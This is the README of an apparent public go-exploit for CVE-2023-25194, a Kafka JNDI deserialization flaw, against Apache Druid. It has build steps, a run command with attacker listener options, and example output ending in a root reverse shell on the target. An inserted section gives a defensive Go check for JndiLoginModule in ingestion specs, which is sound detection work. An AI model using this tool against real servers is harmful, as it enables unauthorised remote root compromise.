# Apache Druid CVE-2023-25194

CVE-2023-25194 is a deserialization vulnerability affecting Apache Kafka. This go-exploit demonstrates CVE-2023-25194 against Apache Druid (which uses Kafka). This type of attack typically requires LDAP JNDI attacker infrastructure that is normally spread across a couple of tools. Here, all of that is built into the go-exploit for ease of exploitation.
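For defenders, the following is an added example and not part of this go-exploit: a Go check that audits a Druid Kafka ingestion spec for a `sasl.jaas.config` naming `com.sun.security.auth.module.JndiLoginModule`, the login module that Kafka 3.4.0 and later disallow by default. It assumes the spec is JSON carrying Kafka client settings under `consumerProperties`; the function names and the sample spec are constructed for illustration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Login module that Kafka 3.4.0 and later disallow by default (the fix for CVE-2023-25194).
const jndiModule = "com.sun.security.auth.module.JndiLoginModule"

// usesJndiModule checks each JAAS entry ("<class> <flag> opt=val ...;") for the module.
func usesJndiModule(cfg string) bool {
	for _, entry := range strings.Split(cfg, ";") {
		if f := strings.Fields(entry); len(f) > 0 && f[0] == jndiModule {
			return true
		}
	}
	return false
}

// walk records the JSON path of every "sasl.jaas.config" value naming the module.
func walk(node interface{}, path string, hits *[]string) {
	switch v := node.(type) {
	case map[string]interface{}:
		for k, child := range v {
			if s, ok := child.(string); ok && k == "sasl.jaas.config" && usesJndiModule(s) {
				*hits = append(*hits, path+"/"+k)
			}
			walk(child, path+"/"+k, hits)
		}
	case []interface{}:
		for i, child := range v {
			walk(child, fmt.Sprintf("%s/%d", path, i), hits)
		}
	}
}

// AuditSpec returns the paths of offending properties found anywhere in a JSON spec.
func AuditSpec(spec []byte) (hits []string, err error) {
	var doc interface{}
	if err = json.Unmarshal(spec, &doc); err == nil {
		walk(doc, "", &hits)
	}
	return hits, err
}

// Constructed sample spec (hypothetical); only the login module name matters to the check.
const sample = `{"spec":{"ioConfig":{"consumerProperties":{"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required;"}}}}`
func main() { fmt.Println(AuditSpec([]byte(sample))) }
```

A hit is a reason to reject the spec before it reaches the Kafka client and to confirm that the bundled Kafka client is 3.4.0 or later.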

## Compiling

To build the exploit into a Docker image, run:

```
make docker
```

If you have a Go build environment handy, you can also just use `make`:

```
albinolobster@mournland:~/cve-2023-25194$ make
gofmt -d -w cve-2023-25194.go
golangci-lint run --fix cve-2023-25194.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-25194_linux-arm64 cve-2023-25194.go
```

## Example Output

```
albinolobster@mournland:~/cve-2023-25194$ ./build/cve-2023-25194_linux-arm64 -c -e -rhost -lhost -lport 1270 -ldapAddr -httpAddr
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting listener on"
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting target" index=0 host= port=8888 ssl=false "ssl auto"=false
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Running a version check on the remote target" host= port=8888
time=2024-03-15T16:02:31.268-04:00 level=VERSION msg="The self-reported version is: 25.0.0" host= port=8888 version=25.0.0
time=2024-03-15T16:02:31.268-04:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host= port=8888 vulnerable=yes
time=2024-03-15T16:02:31.268-04:00 level=STATUS msg="Starting LDAP server on"
time=2024-03-15T16:02:33.271-04:00 level=STATUS msg="Starting HTTP Server on"
time=2024-03-15T16:02:33.335-04:00 level=SUCCESS msg="Received a bind request!"
time=2024-03-15T16:02:33.343-04:00 level=SUCCESS msg="Serialized payload sent!"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit completed"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit successfully completed" exploited=true
time=2024-03-15T16:02:33.640-04:00 level=SUCCESS msg="Caught new shell from"
time=2024-03-15T16:02:33.640-04:00 level=STATUS msg="Active shell from"
bash: cannot set terminal process group (41): Inappropriate ioctl for device
bash: no job control in this shell
root@8e8d1ce79210:/opt/druid# id
uid=0(root) gid=0(root) groups=0(root)
```